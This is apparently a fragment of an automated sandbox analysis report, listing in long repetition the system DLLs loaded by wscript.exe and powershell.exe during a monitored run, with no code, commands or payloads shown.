          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
